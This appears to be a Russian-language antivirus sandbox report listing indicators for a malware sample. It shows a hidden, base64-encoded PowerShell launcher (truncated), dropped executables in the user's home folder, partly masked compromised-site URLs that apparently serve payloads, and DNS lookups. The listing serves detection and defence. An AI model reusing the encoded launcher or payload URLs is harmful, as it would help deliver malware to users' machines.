Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ENCOD IAAgAFMAZQBUACAAKAAnAFMAUgAnACsAJwB5AEMAJwApACAAKAAgACAAWwB0AHkAcABlAF0AKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMAB9ACIAIAAtAGYAIAAnAGQAaQByAEUAQwBUAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1176465.cvr
- %HOMEPATH%\v01rgaf\nh52o_w\q_45u5e08.exe
- %HOMEPATH%\v01rgaf\nh52o_w\q_45u5e08.exe
- %HOMEPATH%\v01rgaf\nh52o_w\q_45u5e08.exe
- http://do###arim.com/wp-admin/AYO/
- http://se####ekifix.com/wp-admin/nBJ/
- http://di######ienne-tiffany.com/wp-includes/p/
- http://fo####llstep.com/cgi-bin/A/
- http://fo####llstep.com/cgi-sys/suspendedpage.cgi
- DNS ASK do###arim.com
- DNS ASK se####ekifix.com
- DNS ASK di######ienne-tiffany.com
- DNS ASK mo###aree.com
- DNS ASK mo####autoloan.com
- DNS ASK fo####llstep.com
- DNS ASK na######aterresources.com